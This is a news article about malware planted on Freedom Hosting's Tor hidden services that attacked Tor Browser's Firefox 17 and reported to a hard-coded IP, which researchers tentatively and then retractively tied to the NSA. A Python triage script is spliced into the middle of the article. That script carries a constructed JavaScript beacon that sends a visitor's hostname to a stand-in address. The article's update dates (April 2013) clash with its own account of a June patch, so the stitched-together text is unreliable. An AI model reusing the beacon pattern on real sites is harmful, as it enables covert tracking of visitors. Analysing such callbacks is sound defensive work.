
Update: Researchers say Tor-targeted malware phoned home to NSA

JavaScript attack had a hard-coded IP address that traced back to NSA address block.


Update April 7, 2013: The researchers at Baneki and Cryptocloud have heavily revised their findings, backing off claims of an explicit connection between the IP addresses associated with malware that attacked Tor browser users and the National Security Agency. They still maintain that there is a high likelihood of a connection, but admit their read of the data that led to the conclusions does not match up with the analysis of others who looked at the data sources later. 

Malware planted on the servers of Freedom Hosting, the "hidden service" hosting provider on the Tor anonymized network brought down late last week, may have de-anonymized visitors to the sites running on that service. The script the malware injected into browsers could send identifying information about site visitors to an Internet Protocol address that was hard-coded into it. And it appears the IP address in question belongs to the National Security Agency (NSA).

This revelation comes from analysis done collaboratively by Baneki Privacy Labs, a collective of Internet security researchers, and VPN provider Cryptocloud. When the IP address was uncovered in the JavaScript exploit—which specifically targets Firefox Long-Term Support version 17, the version included in Tor Browser Bundle—a source at Baneki told Ars that he and others reached out to the malware and security community to help identify the source.

The exploit attacked a vulnerability in the Windows version of the Firefox Extended Support Release 17 browser—the one used previously in the Tor Project's Tor Browser Bundle (TBB). That vulnerability had been patched by Mozilla in June, and the updated browser is now part of TBB. But the TBB configuration of Firefox doesn't include automatic security updates, so users of the bundle would not have been protected if they had not recently upgraded.

Initial investigations traced the address to defense contractor SAIC, which provides a wide range of information technology and C4ISR (Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance) support to the Department of Defense. The geolocation of the IP address corresponds to an SAIC facility in Arlington, Virginia.

Further analysis using a DNS record tool from Robtex found that the address was actually part of several blocks of IP addresses allocated by SAIC to the NSA. This immediately spooked the researchers.
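The triage step the researchers describe, finding the address hard-coded in the injected script and asking which allocated netblock it falls in, is simple to reproduce offline. The following is an added example, not code from the article or from Baneki or Cryptocloud. The payload snippet and the allocation table are constructed sample data using RFC 5737 documentation addresses and fictitious holder names; they are not the real exploit and not real registry records. It also carries a staleness flag, because registry "updated" dates are what tell an analyst how much weight an ownership record can bear.

```python
"""Triage a captured JavaScript payload for hard-coded callback addresses.

Added example (not the article's or the researchers' code). Mirrors the
workflow described in the article: pull the IP literal out of the injected
script, then find the most specific allocated netblock that contains it.
All sample data below is CONSTRUCTED (RFC 5737 ranges, fictitious holders).
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# Constructed stand-in for an injected beacon script: it reports the victim's
# host name to a hard-coded address.  A version string is included so the
# extractor has to distinguish a dotted version number from an IPv4 literal.
SAMPLE_PAYLOAD = r"""
var hostname = window.location.host;
var beacon = "http://203.0.113.77/" + encodeURIComponent(hostname);
var img = new Image(); img.src = beacon;   // phone home
var ver = "17.0.6";                         // not an address, must be ignored
"""

# Exactly four dotted octets, not embedded in a longer dotted or word token.
IPV4_LITERAL = re.compile(r"(?<![\w.])(\d{1,3}(?:\.\d{1,3}){3})(?![\w.])")


def extract_ipv4_literals(script: str) -> list:
    """Return the distinct, syntactically valid, non-loopback IPv4 literals in a script."""
    found = []
    for m in IPV4_LITERAL.finditer(script):
        try:
            addr = ipaddress.IPv4Address(m.group(1))   # rejects octets > 255
        except ipaddress.AddressValueError:
            continue
        if not addr.is_loopback and str(addr) not in found:
            found.append(str(addr))
    return found


@dataclass(frozen=True)
class Allocation:
    network: ipaddress.IPv4Network
    holder: str
    last_updated: str   # registry "updated" date (YYYY-MM-DD), drives the staleness caveat


# Constructed allocation table: a parent block with a reassigned sub-block,
# plus an unrelated block.  Holder names are placeholders.
ALLOCATIONS = [
    Allocation(ipaddress.ip_network("203.0.113.0/24"), "EXAMPLE-ISP (parent block)", "2009-01-15"),
    Allocation(ipaddress.ip_network("203.0.113.64/26"), "EXAMPLE-CONTRACTOR (reassigned)", "2010-06-30"),
    Allocation(ipaddress.ip_network("198.51.100.0/24"), "EXAMPLE-HOSTING", "2013-03-01"),
]


def attribute(ip: str, allocations=ALLOCATIONS, stale_after_year: int = 2012):
    """Return (holder, prefix length, stale?) for the most specific block containing ip.

    Longest-prefix match is used because reassignments nest inside parent
    allocations; the parent alone would attribute the address to the wrong party.
    A record last updated before stale_after_year is flagged so the analyst
    knows the ownership claim needs corroboration.  Returns None if no block matches.
    """
    addr = ipaddress.IPv4Address(ip)
    matches = [a for a in allocations if addr in a.network]
    if not matches:
        return None
    best = max(matches, key=lambda a: a.network.prefixlen)
    stale = int(best.last_updated[:4]) < stale_after_year
    return best.holder, best.network.prefixlen, stale


def triage(script: str, allocations=ALLOCATIONS) -> dict:
    """Map every hard-coded IPv4 literal in the script to its attribution."""
    return {ip: attribute(ip, allocations) for ip in extract_ipv4_literals(script)}


if __name__ == "__main__":
    for ip, result in triage(SAMPLE_PAYLOAD).items():
        if result is None:
            print(f"{ip}: no allocation record")
        else:
            holder, plen, stale = result
            flag = " [record predates cutoff, corroborate before relying on it]" if stale else ""
            print(f"{ip}: {holder} (/{plen}){flag}")
```

Run as a script it reports one callback address attributed to the reassigned /26 rather than the parent /24, with the stale flag set because the constructed record is older than the cutoff. Against real data the table would be populated from registry output, and the flag is the point: an old record is a lead, not a conclusion.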

"One researcher contacted us and said, 'Here's the Robtex info. Forget that you heard it from me,'" said a member of Baneki who requested he not be identified.

The use of a hard-coded IP address traceable back to the NSA is either a strange and epic screw-up on the part of someone associated with the agency (possibly a contractor at SAIC) or an intentional calling card as some analyzing the attack have suggested. One poster on Cryptocloud's discussion board wrote, "It's psyops—a fear campaign... They want to scare folks off Tor, scare folks off all privacy services."

Update, April 5: There are several sources that contend that the analysis of the DNS records by Baneki and Cryptocloud is flawed because of aged domain data for the IP address, and that the address block could be in use by any number of federal agencies or government contractors connected through Verizon Business / UUNET in that area. But DNS data points to the address being owned by SAIC.

Update #2 April 5: A Baneki spokesperson said in response to questions raised about the DNS data, "The malware specialists we know have shared their interpretations with us, which is what we've disclosed, along with the tools used to come to those conclusions; we're entirely open to firsthand experts correcting if, indeed, a correction would be required; again, at that level it seems a question of fact rather than interpretation. We're not the final arbiter of that fact. There's enough top-level DNS/IP subject matter experts that we expect a form of peer review kicks in now." He added, "We've seen many cases of geo info in ARIN inaccurate, but NEVER a case where IP ownership info is 'outdated,' ever. Again, however, we defer to credentialed subject matter experts as the final arbiters on what the IP data signify. We'll be surprised if in the end, it's somehow an 'error' and NSA/SAIC has no connection whatsoever; however, facts are stubborn things & we go with the facts."
